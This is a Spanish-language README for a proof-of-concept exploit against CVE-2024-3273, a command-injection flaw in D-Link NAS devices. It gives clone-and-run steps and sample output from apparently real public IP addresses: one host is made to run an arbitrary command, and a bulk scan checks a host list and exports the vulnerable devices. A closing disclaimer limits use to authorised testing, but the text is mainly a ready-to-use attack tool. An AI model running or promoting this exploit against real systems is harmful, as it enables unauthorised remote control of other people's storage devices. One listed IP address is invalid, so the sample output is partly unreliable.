
Exploit para CVE-2024-3273, soporta hosts individuales y múltiples
Este repositorio contiene una prueba de concepto (PoC) para CVE-2024-3273, una vulnerabilidad de seguridad descubierta en dispositivos NAS de D-Link. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en dispositivos vulnerables.
CVE-2024-3273 es una vulnerabilidad en dispositivos NAS de D-Link que permite a atacantes remotos ejecutar comandos arbitrarios mediante una solicitud HTTP manipulada al endpoint cgi-bin/nas_sharing.cgi.
Esta PoC demuestra cómo se puede explotar la vulnerabilidad para ejecutar comandos en dispositivos NAS de D-Link vulnerables.
requestsClona este repositorio:
git clone https://github.com/adhikara13/CVE-2024-3273.git
Navega al directorio del repositorio:
cd CVE-2024-3273
Ejecuta la PoC:
python main.py
Sigue las instrucciones en pantalla para elegir el dispositivo objetivo:
host:port, y elige si deseas exportar los hosts vulnerables a vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Esta PoC es solo para fines educativos y de investigación. Úsala de manera responsable y únicamente en dispositivos para los que tengas autorización de prueba.
¡Las contribuciones son bienvenidas! Si encuentras algún problema o mejora, no dudes en abrir un issue o crear una pull request.